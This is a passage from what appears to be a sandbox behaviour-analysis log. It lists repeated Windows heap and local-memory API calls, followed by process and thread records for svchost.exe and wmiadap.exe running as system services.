dwFlags=0x0, lpMem=0x291f70 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.724] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291f90 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.724] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291fb0 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.724] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291fd0 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291ff0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292010 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292030 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292090 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2920b0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2920d0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2920f0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292110 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292130 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292150 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292170 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292190 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2921b0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2921d0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2921f0 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292210 | out: hHeap=0x270000) returned 1 [0202.725] GetProcessHeap () returned 0x270000 [0202.725] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292230 | out: hHeap=0x270000) returned 1 [0202.726] GetProcessHeap () returned 0x270000 [0202.726] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292250 | out: hHeap=0x270000) returned 1 [0202.726] GetProcessHeap () returned 0x270000 [0202.726] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292270 | out: hHeap=0x270000) returned 1 [0202.726] GetProcessHeap () returned 0x270000 [0202.726] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292290 | out: hHeap=0x270000) returned 1 [0202.726] GetProcessHeap () returned 0x270000 [0202.726] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2922b0 | out: hHeap=0x270000) returned 1 [0202.726] GetProcessHeap () returned 0x270000 [0202.726] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2922d0 | out: hHeap=0x270000) returned 1 [0202.726] exit (_Code=0) Thread: id = 152 os_tid = 0xb28 Thread: id = 179 os_tid = 0xb74 Thread: id = 181 os_tid = 0x224 Thread: id = 182 os_tid = 0xb7c Thread: id = 186 os_tid = 0x330 [0201.987] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2e5820 [0201.987] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2f6b60 [0201.987] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x2ae4f0 [0201.988] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2fd6c0 [0201.988] LocalReAlloc (hMem=0x2ae4f0, uBytes=0x20, uFlags=0x2) returned 0x2cf3e0 [0201.990] LocalFree (hMem=0x2e5820) returned 0x0 [0201.991] LocalFree (hMem=0x2fd6c0) returned 0x0 [0201.992] LocalFree (hMem=0x2cf3e0) returned 0x0 [0201.992] LocalFree (hMem=0x2f6b60) returned 0x0 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 255 os_tid = 0x5dc Thread: id = 256 os_tid = 0x638 Thread: id = 257 os_tid = 0x554 Thread: id = 258 os_tid = 0x720 Thread: id = 259 os_tid = 0x668 Thread: id = 260 os_tid = 0x65c Thread: id = 261 os_tid = 0x144 Thread: id = 262 os_tid = 0x110 Thread: id = 263 os_tid = 0x3f0 Thread: id = 264 os_tid = 0x3ec Thread: id = 265 os_tid = 0x3e4 Thread: id = 266 os_tid = 0x3e0 Thread: id = 267 os_tid = 0x3d0 Thread: id = 268 os_tid = 0x3cc Thread: id = 269 os_tid = 0x398 Thread: id = 270 os_tid = 0x394 Thread: id = 271 os_tid = 0x384 Thread: id = 272 os_tid = 0x380 Thread: id = 273 os_tid = 0x368 Thread: id = 274 os_tid = 0x350 Thread: id = 275 os_tid = 0x33c Thread: id = 311 os_tid = 0xe0 Process: id = "13" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x45787000" os_pid = "0xb6c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xe], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 276 os_tid = 0xb24 Thread: id = 298 os_tid = 0x360 Thread: id = 299 os_tid = 0x4e0 Thread: id = 301 os_tid = 0xb14 Thread: id = 302 os_tid = 0x67c Thread: id = 303 os_tid = 0x7f0 Thread: id = 315 os_tid = 0xbd8 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 277 os_tid = 0x9a4 Thread: id = 278 os_tid = 0x664 Thread: id = 279 os_tid = 0xa44 Thread: id = 280 os_tid = 0xa14 Thread: id = 281 os_tid = 0x890 Thread: id = 282 os_tid = 0x4e4 Thread: id = 283 os_tid = 0x64 Thread: id = 284 os_tid = 0x5f8 Thread: id = 285 os_tid = 0x5f0 Thread: id = 286 os_tid = 0x5ec Thread: id = 287 os_tid = 0x5d0 Thread: id = 288 os_tid = 0x12c Thread: id = 289 os_tid = 0x170 Thread: id = 290 os_tid = 0x3c0 Thread: id = 291 os_tid = 0x3b8 Thread: id = 292 os_tid = 0x3a8 Thread: id = 293 os_tid = 0x2fc Thread: id = 294 os_tid = 0x2f8 Thread: id = 295 os_tid = 0x2e4 Thread: id = 296 os_tid = 0x2d4 Thread: id = 297 os_tid = 0x2cc Thread: id = 310 os_tid = 0x4a0 Thread: id = 316 os_tid = 0xb70